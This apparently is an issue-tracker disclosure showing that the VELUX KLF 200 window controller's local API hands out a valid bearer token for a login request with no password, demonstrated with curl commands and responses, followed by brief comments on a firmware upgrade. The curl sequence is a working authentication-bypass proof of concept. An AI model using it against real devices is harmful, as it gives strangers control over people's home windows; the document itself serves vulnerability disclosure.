Another episode of Internet Of Things done wrong. This exploit is so trivial, i would not even call it exploit.
VELUX[0] is the leading manufacturer of roof windows (They are really great!). VELUX KLF 200 is a device to control VELUX windows over ethernet/internet[1]. The KLF 200 device has an undocumented API for executing scenes, with other words opening and closing velux windows.
Expected behaviour with correct password:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"velux123"}}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":{},"errors":[]}
Expected behaviour with wrong password:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login","params":{"password":"fnord"}}'
)]}',
{"result":false,"deviceStatus":"IDLE","data":{},"errors":[401]}
Login without password token:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/auth' -X POST -d '{"action":"login"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":false,"deviceStatus":"IDLE","data":{},"errors":[999]}
... returning a valid token:
* julius@macbook ~:$ curl 'http://192.168.2.127/api/v1/products' -H 'Authorization: Bearer 6XmONGhWRF5Wcu4XrTHZLA==' -X POST -d '{"action":"get"}'
)]}',
{"token":"6XmONGhWRF5Wcu4XrTHZLA==","result":true,"deviceStatus":"IDLE","data":[...],"errors":[]}
I assume this is not expected behaviour
Current version:0.1.1.0.41.0
[0] http://www.velux.com/ [1] http://velcdn.azureedge.net/~/media/marketing/de/dokumente/pdf/produktanleitungen/produktdatenblatt/integra/velux-produktdatenblatt-integra-interface-klf200.pdf?la=de-de
Hello, beware, my German ist nicht gut, but I managed to understand that all the scenes are deleted during the upgrade process, and the rediscovery of the shutters and getting them paired was pretty hectic for the user reporting it.
@Sven-H-x how did you manage to get this link? Do you by any chance have release note?